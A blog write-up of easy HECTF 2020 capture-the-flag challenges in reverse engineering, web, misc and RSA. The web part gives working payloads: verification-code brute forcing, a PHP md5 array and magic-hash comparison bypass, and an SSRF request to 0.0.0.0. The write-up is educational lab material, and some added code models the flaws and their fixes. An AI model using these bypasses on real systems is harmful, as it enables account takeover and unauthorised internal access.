
HECTF 2020: write-up for some of the easy challenges

⭐HECTF


I'm really bad at this and had no time to grind the challenges... once again I only did the easy ones...


⭐Reverse


1. Hello_Re



Check with file: 32-bit. Drag it into IDA and, as usual, press Shift+F12 to view the strings:



Jump to the reference and press F5 to view the pseudocode:


scanf("%s", &v4);
if ( strlen(&v4) == 25 && judge0(&v4, 26) )
	puts("Congratulations! You found the flag!");

Double-click judge0 to enter it:


  if ( *a1 != 67 )
    goto LABEL_12;
  if ( a1[1] != 84 )
    return 0;
  if ( a1[2] == 70 && a1[3] == 123 && a1[24] == 125 && judge1(a1) )
    result = 1;
  else
LABEL_12:
    result = 0;
  return result;

So the first four characters of the final flag must be ASCII 67 84 70 123, and the last one 125.


That is:


CTF{20 characters}

Continue by double-clicking judge1:


  for ( i = 0; i <= 25; ++i )
  {
    if ( *(_BYTE *)(i + a1) )
      *(_BYTE *)(i + a1) ^= (_BYTE)i + 1;
  }
  for ( j = 0; j <= 25; ++j )
  {
    if ( *(char *)(j + a1) != arr[j] )
      return 0;
  }
  return 1;

Clearly arr[j] is the key array: the input a1 is first XORed byte by byte with its index plus one, and the result is then compared element by element against arr. So we only need to find out what arr is and apply the same XOR to it once more.


Double-click arr to enter it; I recommend reading it alongside the Hex window.




[Pitfall] Below is how the old IDA 6.6 displays it, which differs from the 7.0 display I used above.



At first I kept treating the empty cell as ' ', but the flag that came out was wrong. After checking across versions, it has to be treated as '', i.e. the way it looks in 6.6. The final script is as follows:


#include <stdio.h>

int main(void) {
	/* arr as read from IDA. The three cells that IDA shows as empty are the byte 0x7F (DEL):
	   '{' ^ 4, 'l' ^ 19 and 'g' ^ 24 all equal 0x7F. The 26th byte is the string
	   terminator, which judge1 compares as well (both of its loops run over 26 bytes). */
	unsigned char arr[26] = {'B','V','E',0x7F,'2','n','N','=','V',';','x','S','L',
	                         'O','P','b','t','s',0x7F,'K','s','!','V',0x7F,'d',0};
	unsigned char a1[26];
	int i;

	for (i = 0; i <= 25; ++i)
		a1[i] = arr[i];
	/* XOR with i+1 is its own inverse, so applying judge1's transform to arr yields the flag */
	for (i = 0; i <= 25; ++i) {
		if (a1[i])
			a1[i] ^= (unsigned char)(i + 1);
	}
	printf("%s\n", (char *)a1);
	return 0;
}

The flag obtained is:


CTF{7hI5_1s_AA_real_f7Ag}

2. game1



Run file: it's 32-bit. Drag it into IDA and press Shift+F12 to view the strings.



Click through to the reference and press F5 to view the pseudocode:


int __cdecl flag(int *a1)
{
  int result; // eax
  signed int v2; // [esp+14h] [ebp-14h]
  signed int i; // [esp+18h] [ebp-10h]
  int v4; // [esp+1Ch] [ebp-Ch]

  v2 = strlen(_data_start__);
  for ( i = 0; i < v2; ++i )
  {
    if ( _data_start__[i] <= 96 || _data_start__[i] > 122 )
    {
      if ( _data_start__[i] <= 64 || _data_start__[i] > 90 )
        LOBYTE(v4) = _data_start__[i];
      else
        v4 = (_data_start__[i] - 65 + a1[i % 5]) % 26 + 97;
    }
    else
    {
      v4 = (_data_start__[i] - 97 + a1[i % 5]) % 26 + 65;
    }
    _data_start__[i] = v4;
  }
  gotoxy(24, 5);
  color(20);
  if ( _data_start__[0] != 72
    || _data_start__[1] != 69
    || _data_start__[2] != 67
    || _data_start__[3] != 84
    || _data_start__[4] != 70 )
  {
    result = printf("No! you're cheating!");
  }
  else
  {
    result = printf("You win! The flag is %s ", _data_start__);
  }
  return result;
}

Note that _data_start__ is the key: the flag is in it. Double-click to view it and get:


bxukv{pW1SiFW_J0_jV}

Clearly this is the raw data, i.e. the string bxukv{pW1SiFW_J0_jV} is encoded to become the flag.


It's also obvious that the final check hard-codes the first five characters, ASCII 72, 69, 67, 84, 70, i.e. HECTF.


And the a1[i % 5] used in the encoding loop can be derived exactly by matching bxukv against HECTF position by position.


With the principle clear, straight to the script:


data = 'bxukv{pW1SiFW_J0_jV}'
target = 'HECTF'
a1 = []
for i in range(5):
    # invert the lowercase branch: (data[i] - 97 + a1[i]) % 26 + 65 == target[i]
    m = ord(target[i]) - 65 - ord(data[i]) + 97
    if m < 0:
        m += 26
    a1.append(m)
print(a1)

This gives a1 = [6, 7, 8, 9, 10]


data = 'bxukv{pW1SiFW_J0_jV}'
a1 = [6, 7, 8, 9, 10]
flag = ''

# Re-run flag()'s transform: lowercase letters become uppercase and vice versa,
# each shifted by a1[i % 5]; every other character is copied through unchanged.
for i in range(len(data)):
    n = ord(data[i])
    if n <= 96 or n > 122:
        if n <= 64 or n > 90:
            flag += chr(n)
        else:
            flag += chr((n - 65 + a1[i % 5]) % 26 + 97)
    else:
        flag += chr((n - 97 + a1[i % 5]) % 26 + 65)

print(flag)

Running it gives the flag:


HECTF{We1cOme_t0_Re}

⭐web


1. Sign-in



Open the challenge and you see a login page.


Ctrl+U to view the source: there is <!-- 15970773575 -->, giving the phone number 15970773575.


Then click "Forgot password", which redirects to the /findpass.php page.



Viewing the source here too, the "send verification code" function does nothing at all. So the four-digit verification code is the hint: brute-force it.


Capture the request and brute-force the code.



Entering the verification code 233 redirects to the updatepassword.php page.



Set a password of your own and log in with it to get the flag:



HECTF{a9a102c0c06fcf6c8072c30f0a52f1f2}

2. ezphp



<?php
error_reporting(0);
highlight_file(__file__);
include('flag.php'); 
$string_1 = $_GET['str1']; 
$string_2 = $_GET['str2']; 

if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])){

        if(is_numeric($string_1)){ 
            $md5_1 = md5($string_1); 
            $md5_2 = md5($string_2); 
            if($md5_1 != $md5_2){ 
                $a = strtr($md5_1, 'cxhp', '0123'); 
                $b = strtr($md5_2, 'cxhp', '0123'); 
                if($a == $b){
                    echo $flag;
                }
                else {
                    die('you are close');
                }
            }  
            else {
               die("md5 is wrong"); 
            }
            } 
        else {
        die('str1 not number'); 
        }
    }
else {
    die('you are wrong!');
}
?> 
you are wrong!

There are two things being tested here. The first is bypassing


$_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])

Note that !== and === here are strict comparisons; we can bypass them with arrays.


That is, md5() fails on an array argument on both sides, so error === error, and the payload is:


param1[]=1&param2[]=2

The second is the md5 comparison:


# is_numeric($string_1) 

$a = strtr($md5_1, 'cxhp', '0123'); 
$b = strtr($md5_2, 'cxhp', '0123'); 
if($a == $b){
    echo $flag;
}

We need a number whose md5 starts with ce, so that strtr turns it into 0e.


That is, a and b both start with 0e, and the loose == comparison, which treats such strings as the number 0, passes.


Strings whose md5 starts with 0e:

  • QNKCDZO
  • 240610708
  • s878926199a
  • s155964671a
  • s214587387a

So the payload is:


str1=9427417&str2=QNKCDZO

The final payload is:


http://121.196.32.184:8081/index.php?param1[]=1&param2[]=2&str1=9427417&str2=QNKCDZO

This gives the flag:


hectf{b0c65ccf32a96a1f8dc3326f16ed4498}
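The two comparisons above, modelled in Python as an added example (not part of the writeup): PHP's loose == turns any string of the form 0e followed by digits into the number 0, and the strtr('cxhp', '0123') step is what lets a digest starting with ce pass once the earlier loose != check has been cleared; the hypothetical strict_gate() shows the fix. The two 0e hashes from the list above are real; the ce string used below is constructed, not an actual digest.

```python
import hashlib
import re

# PHP treats a string as numeric when it looks like an optionally signed decimal or float
# literal, so "0e830400451993494058024219903391" is just the number 0 to `==`.
NUMERIC_RE = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_is_numeric(s: str) -> bool:
    return NUMERIC_RE.match(s) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """PHP's `==` on two strings: both numeric -> compared as numbers, else byte-wise."""
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) == float(b)
    return a == b


def php_strtr(s: str, frm: str, to: str) -> str:
    """Character-for-character strtr(), the form the challenge uses: 'cxhp' -> '0123'."""
    return s.translate(str.maketrans(frm, to))


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def ezphp_second_gate(str1: str, str2: str) -> bool:
    """Model of the inner checks: is_numeric(str1), digests loosely unequal,
    then loosely equal after strtr. Returns True when $flag would be echoed."""
    if not php_is_numeric(str1):
        return False                                    # 'str1 not number'
    m1, m2 = md5_hex(str1), md5_hex(str2)
    if php_loose_eq(m1, m2):                            # `!=` is loose as well, so two
        return False                                    # 0e... digests die here ('md5 is wrong')
    a, b = php_strtr(m1, "cxhp", "0123"), php_strtr(m2, "cxhp", "0123")
    return php_loose_eq(a, b)                           # 'ce...' became '0e...' only now


def strict_gate(str1: str, str2: str) -> bool:
    """The fix: compare digests with === semantics (byte equality). Magic 0e hashes no
    longer match; two different inputs would need a genuine MD5 collision."""
    return md5_hex(str1) == md5_hex(str2)
```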

3. ssrfme



<?php
error_reporting(0);
highlight_file(__FILE__);
//try flag.php
function filter($url) { 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 
$url = $_GET['url'];
if(!filter($url)){
     echo file_get_contents($url);
}
?> url fomat error

Construct the payload:


?url=http://0.0.0.0/flag.php


Result:


flag{04f3eaef-ec7c-4a44-8b54-062cd19295f3}
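The filter above only rejects 127/8, 10/8, 172.16/12 and 192.168/16 by shifting the packed address, so 0.0.0.0, which on Linux connects to the local host, gets through. Below is an added Python model of that filter next to a hardened variant (my own code and names, not the challenge's); it assumes the URL host is an IP literal, since gethostbyname() is not modelled.

```python
import ipaddress
import re
import struct
from urllib.parse import urlparse


def ip2long(ip: str) -> int:
    """Same value PHP's ip2long() gives for a dotted quad; raises ValueError otherwise."""
    return struct.unpack("!I", ipaddress.IPv4Address(ip).packed)[0]


def challenge_filter_blocks(url: str) -> bool:
    """Mirror of the challenge's filter(): True when the URL is rejected."""
    if not re.match(r"^(http|https)?://.*(/)?.*$", url):
        return True                           # 'url fomat error'
    host = urlparse(url).hostname or ""
    try:
        ip = ip2long(host)
    except ValueError:
        ip = 0                                # PHP: ip2long() returns false, which shifts to 0
    return (ip2long("127.0.0.0") >> 24 == ip >> 24        # 127.0.0.0/8
            or ip2long("10.0.0.0") >> 24 == ip >> 24      # 10.0.0.0/8
            or ip2long("172.16.0.0") >> 20 == ip >> 20    # 172.16.0.0/12
            or ip2long("192.168.0.0") >> 16 == ip >> 16)  # 192.168.0.0/16


def hardened_filter_blocks(url: str) -> bool:
    """Allow-list the scheme and reject every non-global address, so 0.0.0.0,
    169.254.x.x, IPv6 loopback and the like are caught along with the four ranges."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return True
    try:
        addr = ipaddress.ip_address(parts.hostname)
    except ValueError:
        return True   # not an IP literal: resolve it and re-check every returned address
    return not addr.is_global
```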

⭐misc


1. Sign-in


Just go to the livestream room.


2. png



Download the PNG and open it in 010 Editor; there is a base64 string at the very end:


M2I3OWJkZjhmY2ZkNTVmZH0=

Decoding it gives:


3b79bdf8fcfd55fd}


Clearly this is the latter half of the flag.


Next we need the first half. Try changing the image height:



Sure enough, the first half appears.



The flag is:


flag{94ed7fdae8f504743b79bdf8fcfd55fd}
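What the height edit does at the byte level, as an added example that is not part of the writeup: make_png() constructs a sample image whose IDAT carries more scanlines than IHDR declares, rows_in_idat() detects that mismatch (the signal that rows are hidden), and set_height() applies the IHDR fix with the CRC recomputed so viewers do not reject the chunk. All function names are my own.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def chunk(ctype: bytes, data: bytes) -> bytes:
    """length + type + data + CRC32 over type and data, as the PNG spec requires."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def make_png(width: int, rows: int, declared_height: int) -> bytes:
    """Constructed sample: 8-bit RGB image whose IDAT holds `rows` zero-filled scanlines
    while IHDR claims `declared_height`, which is how the challenge hid the top part."""
    ihdr = struct.pack(">IIBBBBB", width, declared_height, 8, 2, 0, 0, 0)
    raw = (b"\x00" + b"\x00" * 3 * width) * rows        # filter byte 0 + RGB pixels per row
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def read_ihdr(png: bytes) -> tuple:
    """(width, height, crc_ok) from the first chunk, which must be IHDR."""
    length, = struct.unpack(">I", png[8:12])
    ctype, data = png[12:16], png[16:16 + length]
    stored, = struct.unpack(">I", png[16 + length:20 + length])
    width, height = struct.unpack(">II", data[:8])
    return width, height, stored == zlib.crc32(ctype + data)


def rows_in_idat(png: bytes) -> int:
    """Decompress all IDAT chunks and count the scanlines really present."""
    width = read_ihdr(png)[0]
    pos, idat = 8, b""
    while pos < len(png):
        length, = struct.unpack(">I", png[pos:pos + 4])
        if png[pos + 4:pos + 8] == b"IDAT":
            idat += png[pos + 8:pos + 8 + length]
        pos += 12 + length
    return len(zlib.decompress(idat)) // (1 + 3 * width)


def set_height(png: bytes, new_height: int) -> bytes:
    """Patch the IHDR height and recompute its CRC, the edit the writeup makes in 010 Editor."""
    data = bytearray(png[16:29])                         # the 13 IHDR data bytes
    struct.pack_into(">I", data, 4, new_height)
    return png[:8] + chunk(b"IHDR", bytes(data)) + png[33:]
```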

3. 不說人話 ("Not speaking human language")



This is clearly Ook! encoding:


..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... .....
!.!!! !!!!. !!!!! .?... ..... .!?!! .?... ..... ?.?!. ?..!. ?.... ...!?
!!.?! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ....! ?!!.? ..... .....
....? .?!.? ..... ...!. ?.... ..... ....! ?!!.? !!!!! !!!!! !!?.? !.?!!
!!!!! .?... ....! ?!!.? !!!!! !?.?! .?!!! !!!!. ?.... ..... !?!!. ?!!!!
!!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
..... .?.?! .?... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!!! !!.?.
..... ..... ..!?! !.?!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!!! !!.?.
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ...!. ?.... .....
!?!!. ?!!!! !!!!? .?!.? !!!!! !!!!. ..... ...!. ?.... ...!? !!.?. .....
?.?!. ?.... ..... ...!. ..... ..... ....! .!!!! !!!!! !!!!! !!!!! .....
....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... ..... .....
..!.? ..... ..... ...!? !!.?! !!!!! !!!!! !?.?! .?!!! !!.!! !!!!! !!!!!
!!!!! ..... ..!.? ..... ..... ..... !?!!. ?.... ..... ..... ?.?!. ?....
..... ..... ....! .?... ....! ?!!.? !!!!! !?.?! .?!!! .!!!! !!!.? .....
..... ..... !?!!. ?!!!! !!!!! !!!!! ?.?!. ?!.?. ..... ..... ..... .!?!!
.?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... !.?.

Decode it online:


HECTF{TH1s_1s_crypt0_914nda0}
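An offline decoder for the short Ook! form above, added here as an example rather than taken from the writeup: each pair of symbols maps to one Brainfuck command, and the program is then run under a step limit because it is untrusted input. The challenge text can be passed to ook_decode() in place of the online decoder; the test programs are constructed ones.

```python
# Short-form Ook! uses only '.', '!' and '?'; every pair of symbols is one Brainfuck command.
OOK_TO_BF = {".?": ">", "?.": "<", "..": "+", "!!": "-",
             "!.": ".", ".!": ",", "!?": "[", "?!": "]"}


def ook_to_bf(text: str) -> str:
    """Ignore whitespace and anything else, then translate symbol pairs to Brainfuck."""
    syms = [ch for ch in text if ch in ".!?"]
    if len(syms) % 2:
        raise ValueError("odd number of Ook! symbols")
    return "".join(OOK_TO_BF[a + b] for a, b in zip(syms[0::2], syms[1::2]))


def run_bf(code: str, max_steps: int = 1_000_000) -> str:
    """Minimal Brainfuck interpreter; the step limit stops a malicious infinite loop."""
    jumps, stack = {}, []
    for i, ch in enumerate(code):                   # precompute matching brackets
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            j = stack.pop()                         # IndexError here means an unmatched ']'
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unmatched '['")
    tape, ptr, pc, out = bytearray(30000), 0, 0, bytearray()
    for _ in range(max_steps):
        if pc >= len(code):
            return out.decode("latin-1")
        ch = code[pc]
        if ch == ">": ptr += 1
        elif ch == "<": ptr -= 1
        elif ch == "+": tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-": tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".": out.append(tape[ptr])
        elif ch == "[" and tape[ptr] == 0: pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0: pc = jumps[pc]
        pc += 1                                     # ',' (input) is a no-op: no stdin here
    raise RuntimeError("step limit exceeded")


def ook_decode(text: str) -> str:
    return run_bf(ook_to_bf(text))
```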

⭐crypto


1. rsa



The download gives n, e and c:


n = 11419768903339716189261532371559705252086398275876008505047375123074727093589680611869748263351554093957968142343831331654606932684767042958427409579115435445187908134556329979271179879129295667476493886787230948520371350715808988496083694717544298343260369816980228394498856751096191942011545898984240281874509791880690092840536597771674772617299407710771426964764347566008897012753022763270832647775571317162594044338095870404550665457899223394942640876850692848671826594750236910363027949459768124646230555766323417693441861436560072288812137944884954974348317322412816157152702695143094487806945533233359294549423
e = 65537
c = 575061710950381118206735073806398116370706587076775765253483131078316908073202143802386128272374323616239083134747318254436706806781744501903333604772961927966747648954315962269321297121495398057938617145017999482722197661065698707836824505023856306403892307944203245563411961302499347604417024064678999003637933185177922884103362203639349298263339808508185861692596967147081382566246627668898774233029198694500565511361867375668367875805985660705137109665107860799277624050210666866958502948062330037309873148963011192405012811945540153592090345668265964477204465327474208098404082920129178960510763496025906621820

Factor n to get p and q.


Run the script:


import libnum
from Crypto.Util.number import long_to_bytes

c = 575061710950381118206735073806398116370706587076775765253483131078316908073202143802386128272374323616239083134747318254436706806781744501903333604772961927966747648954315962269321297121495398057938617145017999482722197661065698707836824505023856306403892307944203245563411961302499347604417024064678999003637933185177922884103362203639349298263339808508185861692596967147081382566246627668898774233029198694500565511361867375668367875805985660705137109665107860799277624050210666866958502948062330037309873148963011192405012811945540153592090345668265964477204465327474208098404082920129178960510763496025906621820
e = 65537

q = 2499568793
p = 4568695582742345507136251229217400959960856046691733722988345503429689799935696593516299458516865110324638359470761456115925725067558499862591063153473862179550706262380644940013531317571260647226561004191266100720745936563550699000939117068559232225644277283541933064331891245169739139886735615435506152070330233107807124410892978280063993668726927377177983100529270996547002022341628251905780873531481682713820809147098305289391835297208890779643623465917824350382592808578978330348769060448006691307027594085634520759293965723855183484366752511654099121387261343686017189426761536281948007104498017003911
n = q * p

d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)  # m as a decimal integer
string = long_to_bytes(m)  # m as plaintext bytes
print(string)  # printed in the form b'...'

# print(libnum.n2s(m))  # n2s also converts the number to a string

This gives the flag:


flag{8fb873baba0df4a6423be9f4bd525d93}
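How the factoring step itself can be done when one prime is small, as an added example that is not the author's script: Pollard's rho on the challenge's n recovers the 32-bit q, because its cost grows with the square root of the smallest factor rather than with the size of n, after which decryption proceeds as above. N, E and C are copied from the challenge values; pollard_rho and rsa_decrypt are my own helper names, and the run takes a few seconds in CPython.

```python
from math import gcd

# n, e, c exactly as given in the challenge.
N = 11419768903339716189261532371559705252086398275876008505047375123074727093589680611869748263351554093957968142343831331654606932684767042958427409579115435445187908134556329979271179879129295667476493886787230948520371350715808988496083694717544298343260369816980228394498856751096191942011545898984240281874509791880690092840536597771674772617299407710771426964764347566008897012753022763270832647775571317162594044338095870404550665457899223394942640876850692848671826594750236910363027949459768124646230555766323417693441861436560072288812137944884954974348317322412816157152702695143094487806945533233359294549423
E = 65537
C = 575061710950381118206735073806398116370706587076775765253483131078316908073202143802386128272374323616239083134747318254436706806781744501903333604772961927966747648954315962269321297121495398057938617145017999482722197661065698707836824505023856306403892307944203245563411961302499347604417024064678999003637933185177922884103362203639349298263339808508185861692596967147081382566246627668898774233029198694500565511361867375668367875805985660705137109665107860799277624050210666866958502948062330037309873148963011192405012811945540153592090345668265964477204465327474208098404082920129178960510763496025906621820


def pollard_rho(n: int, c: int = 1, batch: int = 64) -> int:
    """Floyd-cycle Pollard rho with batched gcds. Expected work is about sqrt(q) steps
    for the smallest prime q, so a ~2.5e9 factor needs only tens of thousands of steps."""
    x = y = 2
    while True:
        acc = 1
        for _ in range(batch):
            x = (x * x + c) % n
            y = (y * y + c) % n
            y = (y * y + c) % n
            acc = acc * abs(x - y) % n
        d = gcd(acc, n)
        if d == n:                     # both factors (or x == y) hit in one batch: new constant
            return pollard_rho(n, c + 1, batch)
        if d > 1:
            return d


def rsa_decrypt(n: int, e: int, c: int, p: int, q: int) -> bytes:
    """Textbook RSA: d = e^-1 mod phi(n), m = c^d mod n, returned as big-endian bytes."""
    d = pow(e, -1, (p - 1) * (q - 1))
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def solve() -> bytes:
    q = pollard_rho(N)
    return rsa_decrypt(N, E, C, q, N // q)


if __name__ == "__main__":
    print(solve())
```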

Go easy on me, pros... next time I'll definitely, definitely, definitely grind properly!!!


[Please link back when reposting] https://www.cnblogs.com/Jlay/p/HECTF_2020_eywp.html